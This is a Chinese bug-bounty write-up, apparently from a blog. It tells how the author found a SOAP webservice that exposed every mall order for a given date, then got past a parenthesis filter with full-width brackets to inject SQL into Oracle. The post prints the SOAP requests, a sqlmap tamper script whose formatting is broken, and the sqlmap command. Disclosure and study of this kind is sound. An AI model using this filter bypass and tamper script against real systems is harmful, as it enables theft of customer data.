重生之我是赏金猎人-SRC漏洞挖掘(五)-轻松GET某src soap注入
0x01 挖掘
在对某SRC测试时,本人根据其证书信息收集到了部分深度子域,并找到了其对应的业务IP段 写了个shell脚本+ffuf批量fuzz某src c段资产目录
发现了xxSRC c段的一个提供了webservice的服务器
http://180.x.x.x/webservice/
获取到接口
http://180.x.x.x/webservice/syncOrderToOdcService
使用soup ui 进行调试
数据
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:odc="http://odc.ws.qiku.com/">
<soapenv:Header/>
<soapenv:Body>
<odc:syncOrderInfo>
<!--Optional:-->
<arg0></arg0>
</odc:syncOrderInfo>
</soapenv:Body>
</soapenv:Envelope>
<arg0></arg0>
当中间无参数值时
Soap接口抛出了一个Oracle的错误信息,并提示“Date format error,YY-MM-DD”
随后很简单了,构造一个符合条件的date数据
2021-9-23
Soap request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:odc="http://odc.ws.qiku.com/">
<soapenv:Header/>
<soapenv:Body>
<odc:syncOrderInfo>
<!--Optional:-->
<arg0>2021-9-23</arg0>
</odc:syncOrderInfo>
</soapenv:Body>
</soapenv:Envelope>
arg0处为日期参数,指定日期,即可查询到xx src商城所有订单信息
属于严重泄露客户数据的漏洞
如有技术交流或渗透测试/代码审计/SRC漏洞挖掘/红队方向综合培训 红蓝对抗评估需求的朋友
欢迎联系QQ/VX-547006660
0x03 Soap接口的注入
看了一下oracle都爆出SQL的错误信息了,并且没有预编译相关的提示,这不得注入一波?
但是在注入的时候发现程序会将括号()过滤掉,导致函数无法执行,sqlmap注入不出来
这时候就要用到骚姿势了
在Oracle中文版本中,中文括号()可以代替英文()而且不报错!
EG:
# 纯中文括号
SQL> select (1+1) from dual;(1+1)
----------2
剩下的就很简单了,改一个tamper出来
#!/usr/bin/env python"""
Copyright (c) 2006-2016 sqlmap developers ([url]http://sqlmap.org/[/url])
See the file 'doc/COPYING' for copying permission
"""import os
import refrom lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY__priority__ = PRIORITY.HIGHESTdef dependencies():singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL))def tamper(payload, **kwargs):retVal = payloadif payload:retVal = re.sub(r"\s*(\s*", "(", retVal)
retVal = re.sub(r"\s*)\s*", ")", retVal)return retVal
python sqlmap.py -r xxx.txt --dbs --tamper=brackets.py //注入请求,在日期处加*
w到手,收摊
重生之我是赏金猎人-SRC漏洞挖掘(五)-轻松GET某src soap注入相关推荐
- 重生之我是赏金猎人(二)-逆向app破解数据包sign值实现任意数据重放添加
0x00 项目背景 该系列旨在分享自己和团队在SRC.项目实战漏洞测试过程中的有趣案例,如果读者能从本项目习得一些有用的知识,那么笔者将非常荣幸. 该系列首发github:https://github ...
- 绝对干货!src漏洞挖掘经验分享
公粽号:黒掌 一个专注于分享渗透测试.黑客圈热点.黑客工具技术区博主! src漏洞挖掘经验分享 – 掌控安全以恒 一.公益src 公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现 ...
- 重生之我是赏金猎人-SRC漏洞挖掘(二)-逆向app破解数据包sign值实现任意数据重放添加
0x00前言 本期登场的目标虽不是SRC,但是整个漏洞的利用手法很有学习意义.目前在很多大厂的http数据包中都会添加sign值对数据包是否被篡改进行校验,而sign算法的破解往往是我们漏洞测试的关键 ...
- 重生之我是赏金猎人(九)-从本无法触发的xss到梦幻联动挖掘多个致命接口下的XSS触发点
0x00 项目背景 该系列旨在分享自己和团队在SRC.项目实战漏洞测试过程中的有趣案例,如果读者能从本项目习得一些有用的知识,那么笔者将非常荣幸. 该系列首发github:https://github ...
- 重生之我是赏金猎人(七)-看我如何从FUZZ到XSS在SRC官网偷走你的个人信息
0x00 项目背景 该系列旨在分享自己和团队在SRC.项目实战漏洞测试过程中的有趣案例,如果读者能从本项目习得一些有用的知识,那么笔者将非常荣幸. 该系列首发github:https://github ...
- 干货|SRC漏洞挖掘经验
先谈个人经历,我虽然很早前就像挖掘SRC来锻炼自己,但真正实现起来大概也是2月初的时候.一开始在几大SRC平台,如顺丰SRC,小米SRC等装了两下,真的不知道从何入手.而且,SRC提交这事从来都是前人 ...
- SRC漏洞挖掘之偏门资产收集篇
写这篇文章的目得,就是跟大家分享一下平时我挖src漏洞的一些经验,当自己挖到某个站点的漏洞时,往往就会欣喜若狂的往src平台上提交,得到的结果却是 "漏洞已重复,感谢提交" ,其实 ...
- SRC漏洞挖掘--CNVD国家信息安全漏洞共享平台
目录 0x00 简介 0x01 过程中使用的工具 0x02 详细过程 一. 寻找挖洞目标 1.1 工具介绍 1.2 目标检索过程 二. 趁手的挖洞工具 2.1 工具介绍 2.2 工具下载链接 2.3 ...
- 重生之我是赏金猎人-番外篇-记一次层层突破的攻防演练
0x00 前言 本文简单记述了一下本人在某攻防演练过程中一次层层突破的有趣经历 技术性一般,但是层层突破属实艰难,并用到了比较多的思路,还望各位大佬多多指教 0x01 SSO账号获取 由于目标是某大学 ...
最新文章
- 由Photoshop高反差保留算法原理联想到的一些图像增强算法。
- Git之深入解析凭证存储
- 第十七章 我国农业科学技术
- 完全内核移植–kernel3.15.3
- 【算法】剑指 Offer 56 - II. 数组中数字出现的次数 II 【重刷】
- dos窗口运行.java文件
- ubuntu16.04便捷使用(常用工具、常用快捷键、常用使用教程)
- 电气能插本计算机类吗,2019年专插本电气工程及自动化专业介绍
- 循环神经网络应用举例
- Python调整图片的文件大小
- 通过二进制逻辑运算解题
- 360安全杀毒软件扫描计算机病毒,360木马查杀能扫描病毒吗
- 设计模式——备份模式
- 移动硬盘打不开,千万别轻易格式化
- funny_upload
- mysql数据库报 请在mysql配置文件修sql-mode为NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTITUTION
- 《最优状态估计-卡尔曼,H∞及非线性滤波》:第7章 卡尔曼滤波的扩展
- 【区块链论文阅读】A Weak Consensus Algorithm and Its Applic
- Invalidate()、InvalidateRect()、InvalidateRgn、UpdateWindow()
- VScode输入vue -V提示vue : 无法加载文件
热门文章
- 电子束光刻胶(HSQXR-1541-006,mr-I 9000M)
- Windows Update错误80070003解决方法
- 海思开发板遇到的问题启发性的链接
- uni.uploadFile上传手机内部图片
- 零元学Expression Design 4 - Chapter 7 使用内建功能「Clone」来达成Path的影分身之术...
- linux检查邮件命令,linux下mail 邮件查看命令
- 纵横20年,我所经历的数据开放演化史 by 傅一平
- 2022卡塔尔世界杯引爆全球,跨境电商如何做好选品和营销?
- winrar远程代码执行漏洞(cve-2018-20250)
- 黑马程序员Java零基础视频教程(2022最新Java)B站视频学习笔记-Day15-阶段项目(拼图小游戏)(上篇)